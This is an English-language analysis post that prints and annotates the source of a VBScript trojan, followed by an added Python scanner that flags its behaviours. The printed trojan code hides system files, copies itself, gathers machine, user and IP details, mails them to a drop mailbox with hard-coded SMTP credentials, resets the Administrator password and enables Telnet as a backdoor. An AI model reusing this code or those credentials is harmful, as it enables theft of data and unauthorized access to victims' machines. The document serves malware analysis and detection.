The "BUPT Boy Trojan": fully annotated source
- VBScript code
'
' 1. Main body
'
' When the script runs, the main-body code executes top to bottom,
' so reading this part first shows the overall flow of the program.
On Error Resume Next

' FileSystemObject for file operations
Set fso = CreateObject("Scripting.FileSystemObject")
' Shell object (registry writes, environment variables, Run)
Set WshShell = CreateObject("WScript.Shell")
' Network object (computer name, user name)
Set WshNetWork = WScript.CreateObject("Wscript.NetWork")

' Full path of the running script, e.g. J:\Butp.dat
ThisPath = WScript.ScriptFullName
' GetSpecialFolder(1) = system folder, normally C:\Windows\System32
SysDir = fso.GetSpecialFolder(1) & "\"
' Derive the Windows directory by truncating SysDir:
' C:\Windows\System32\ -> C:\Windows\ (assumes the default 11-character path)
WinDir = Left(SysDir, 11)

' Names of the files the trojan drops. Note the legitimate-looking
' svchost.exe, which goes into C:\Windows\ rather than System32,
' where the real svchost.exe lives.
SvcHost = "svchost.exe"
FnSys = "svchost.dat"
FnSysExe = "scs.exe"
FnMail = "liam.dat"
FnuTray = "bupt.dat"
FnuTrayExe = "scs"

' Read a copy of the script's own source (used when it copies itself)
Set file = fso.OpenTextFile(ThisPath, 1) ' 1 = ForReading
VBScriptCopy = file.ReadAll
file.Close
Set file = Nothing

If LCase(SysDir) = LCase(Left(ThisPath, Len(SysDir))) Then
    ' The script is running from the system directory (System32), i.e. it is
    ' already installed: exfiltrate, plant the backdoor, enumerate the tray
    Call SendMail
    Call SetupBD
    Call ListEnuTray
Else
    ' Running from somewhere else (e.g. a USB stick). First make Explorer hide
    ' protected system files so the dropped files stay out of sight.
    ' "Reg_DOWRD" is a typo in the original sample (WSH expects "REG_DWORD");
    ' whatever error it raises is swallowed by On Error Resume Next.
    WshShell.RegWrite "HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\showsuperhidden", 0, "Reg_DOWRD"
    WshShell.RegWrite "HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\superhidden", 1, "Reg_DOWRD"
    ' Left(ThisPath, 2) is the drive letter plus colon, e.g. "J:"; Run opens
    ' that drive in Explorer, so the user sees the window they expected.
    ' (The 2 is the length argument of Left, not a window-style flag.)
    WshShell.Run(Left(ThisPath, 2))
    ' If any of the dropped files is missing, (re)install
    If Not fso.FileExists(SysDir & FnSys) Or Not fso.FileExists(SysDir & FnSysExe) Or Not fso.FileExists(WinDir & SvcHost) Then
        Call InfectSys
    End If
End If
' End of main body

'
' 2. Functions
'
' Nothing in this part runs on its own; a routine executes only when the
' main body calls it, so read each one in the context of that call.

' 2.1 Send the e-mail
Sub SendMail
    On Error Resume Next
    ' Collect the machine name and user name, look up the public IP and its
    ' geographic location through an IP-lookup site (the same trick many
    ' "stealer" scripts on the net use), and pack it all into one message.
    ComputerName = "Computer name:" & WshNetWork.ComputerName
    UserName = "Current user:" & WshShell.ExpandEnvironmentStrings("%UserName%")
    Url = "http://www.ip138.cn" ' note: this is the IP-lookup site
    Html = GetHttpPage(Url)     ' GetHttpPage is defined later in the script (not included in this post)
    PlaceBegin = Instr(1, Html, "你当前的IP为")   ' the page's "Your current IP is" marker
    PlaceEnd = Instr(PlaceBegin, Html, VBCRLF)
    Place = Mid(Html, PlaceBegin, PlaceEnd - PlaceBegin)
    Msg = ComputerName & "," & UserName & "," & Place
    Title = GetIp(".")  ' GetIp is defined later (not included in this post)
    ' The packed message is stored in system32\liam.dat so the same data is not
    ' mailed twice. If your machine is infected, open liam.dat in Notepad and
    ' you will see your own system's information.
    If fso.FileExists(SysDir & FnMail) Then
        Set file = fso.OpenTextFile(SysDir & FnMail, 1)
        OldMsg = file.ReadAll
        file.Close
        Set file = Nothing
        If OldMsg = Msg Then Exit Sub
    End If
    Call WriteFile(SysDir & FnMail, Msg)   ' WriteFile is defined later (not included)

    ' Send the collected data by e-mail through CDO. A QQ mailbox is used, and
    ' the account mails itself (shader.bupt@qq.com). I once searched QQ for
    ' shader.bupt@qq.com; it is not a publicly listed account, so nothing came up.
    ' Note that the SMTP user name and password are hard-coded in the script:
    ' anyone holding a copy of the sample can log in to the drop mailbox.
    NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
    Set EMail = CreateObject("Cdo.Message")
    EMail.From = "shader.bupt@qq.com"
    EMail.To = "shader.bupt@qq.com"
    EMail.Subject = Title
    EMail.TextBody = Msg & "," & Now
    With EMail.Configuration.Fields
        .Item(NameSpace & "SendUsing") = 2        ' 2 = cdoSendUsingPort: SMTP over the network
        .Item(NameSpace & "SmtpServer") = "smtp.qq.com"
        .Item(NameSpace & "SmtpServerPort") = 25
        .Item(NameSpace & "SmtpAuthenticate") = 1 ' 1 = cdoBasic authentication
        .Item(NameSpace & "SendUserName") = "shader.bupt"
        .Item(NameSpace & "SendPassword") = "52162"
        .UpDate
    End With
    EMail.Send
End Sub

' 2.2 Plant the backdoor (SetupBD) on the target machine
Sub SetupBD
    On Error Resume Next
    If LCase(WshNetWork.UserName) <> "administrator" Then
        ' Reset the local Administrator password to 52162 (the same string as
        ' the mailbox password) through ADSI. This only works if the current
        ' user has administrative rights.
        Set objUser = GetObject("WinNT://./administrator, user")
        objUser.SetPassword "52162"
        objUser.SetInfo
        ' Set the Telnet service (tlntsvr) start type to 2 (Automatic) so it
        ' starts at boot; with the known Administrator password, the attacker
        ' can then telnet in. The sample writes to ControlSet001 directly
        ' rather than CurrentControlSet.
        WshShell.RegWrite "HKLM\System\Controlset001\services\tlntsvr\start", 2, "REG_DWORD"
    End If
End Sub

' Input limit: only 10,000 characters can be entered. The post stops here;
' the routines called above (InfectSys, ListEnuTray, GetHttpPage, GetIp,
' WriteFile) are not included.
' End of functions
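The behaviours annotated above (CDO mailing with hard-coded SMTP credentials, the Explorer hidden-file writes, the script reading its own source before copying itself, the ADSI reset of the Administrator password and the service Start write) are exactly the things an analyst wants flagged when the next sample of this kind turns up. The static triage below is an added example, not part of the original post and not the trojan's own code: the rule names, the `scan_vbs`/`triage` helpers and the `SAMPLE` text (a constructed stand-in with placeholder credentials that mimics the structure of the script on this page) are all this example's own. It also pulls the mail server, account and password out of the CDO configuration so they can be reported for takedown.

```python
"""Static triage of a VBScript stealer/dropper sample.

Rule names, helper names and the SAMPLE text are constructed for this
example; they are not taken from the trojan or from the original post.
"""
import json
import re
from collections import defaultdict

# Behaviour rules. Everything is case-insensitive because VBScript
# identifiers, COM ProgIDs and registry paths are case-insensitive.
RULES = {
    # CDO.Message: the COM mailer used to ship the collected data out.
    "cdo_mailer": re.compile(r'CreateObject\(\s*"cdo\.message"\s*\)', re.I),
    # ADSI handle on the local Administrator account, then a SetPassword call.
    "admin_account_handle": re.compile(r'GetObject\(\s*"WinNT://[^"]*administrator[^"]*"', re.I),
    "set_password": re.compile(r'\.SetPassword\s+"[^"]*"', re.I),
    # Direct write of a service's Start value under HKLM\System\...\services.
    "service_start_write": re.compile(r'RegWrite\s+"HKLM\\System\\[^"]*\\services\\[^"\\]+\\start"', re.I),
    # Explorer "hide protected operating system files" toggles.
    "hide_system_files": re.compile(r'RegWrite\s+"HKCU\\[^"]*Explorer\\Advanced\\(ShowSuperHidden|SuperHidden)"', re.I),
}
# "self_read" needs one step of data flow: the script's own path is usually
# stored in a variable first, so aliases of WScript.ScriptFullName are tracked.
SCRIPT_PATH_ALIAS = re.compile(r'^\s*(\w+)\s*=\s*WScript\.ScriptFullName\b', re.I)
OPEN_TEXT_FILE = re.compile(r'OpenTextFile\(\s*([\w.]+)', re.I)
# CDO configuration fields (string or numeric value) and envelope addresses.
CDO_FIELD = re.compile(
    r'"(SmtpServer|SmtpServerPort|SendUserName|SendPassword)"\s*\)\s*=\s*(?:"([^"]*)"|(\d+))', re.I)
ADDR = re.compile(r'\.(From|To)\s*=\s*"([^"]+)"', re.I)


def scan_vbs(source):
    """Return {rule_name: [line numbers]} for every rule that fires."""
    hits = defaultdict(list)
    aliases = {"wscript.scriptfullname"}
    for lineno, line in enumerate(source.splitlines(), 1):
        m = SCRIPT_PATH_ALIAS.match(line)
        if m:
            aliases.add(m.group(1).lower())
        for name, rx in RULES.items():
            if rx.search(line):
                hits[name].append(lineno)
        m = OPEN_TEXT_FILE.search(line)
        if m and m.group(1).lower() in aliases:
            hits["self_read"].append(lineno)
    return dict(hits)


def extract_mail_config(source):
    """Pull the hard-coded SMTP settings and addresses out of the CDO block."""
    cfg = {}
    for m in CDO_FIELD.finditer(source):
        cfg[m.group(1).lower()] = m.group(2) if m.group(2) is not None else int(m.group(3))
    for m in ADDR.finditer(source):
        cfg[m.group(1).lower()] = m.group(2)
    return cfg


def classify(hits):
    """Turn raw rule hits into behaviour tags for the triage report."""
    tags = []
    if "cdo_mailer" in hits:
        tags.append("exfiltration-by-smtp")
    if "admin_account_handle" in hits and "set_password" in hits:
        tags.append("admin-password-reset")
    if "service_start_write" in hits:
        tags.append("service-autostart")
    if "hide_system_files" in hits:
        tags.append("explorer-tamper")
    if "self_read" in hits:
        tags.append("self-replicating")
    return tags


def triage(source):
    hits = scan_vbs(source)
    return {"hits": hits, "tags": classify(hits), "mail": extract_mail_config(source)}


# Constructed sample mirroring the structure of the annotated script; the
# addresses, server and password are placeholders, not the real ones.
SAMPLE = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
ThisPath = WScript.ScriptFullName
Set file = fso.OpenTextFile(ThisPath, 1)
VBScriptCopy = file.ReadAll
WshShell.RegWrite "HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\showsuperhidden", 0, "Reg_DOWRD"
Set EMail = CreateObject("Cdo.Message")
EMail.From = "drop.account@example.com"
EMail.To = "drop.account@example.com"
With EMail.Configuration.Fields
  .Item(NameSpace & "SmtpServer") = "smtp.example.com"
  .Item(NameSpace & "SmtpServerPort") = 25
  .Item(NameSpace & "SendUserName") = "drop.account"
  .Item(NameSpace & "SendPassword") = "hunter2"
End With
Set objUser = GetObject("WinNT://./administrator, user")
objUser.SetPassword "hunter2"
WshShell.RegWrite "HKLM\System\Controlset001\services\tlntsvr\start", 2, "REG_DWORD"
'''

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it against a suspected `.vbs`/`.dat` file by passing the file's contents to `triage()`; a clean administrative script that only uses FileSystemObject produces no tags, while a sample shaped like the one on this page lights up all five. The line numbers in `hits` point the analyst straight at the lines to read first.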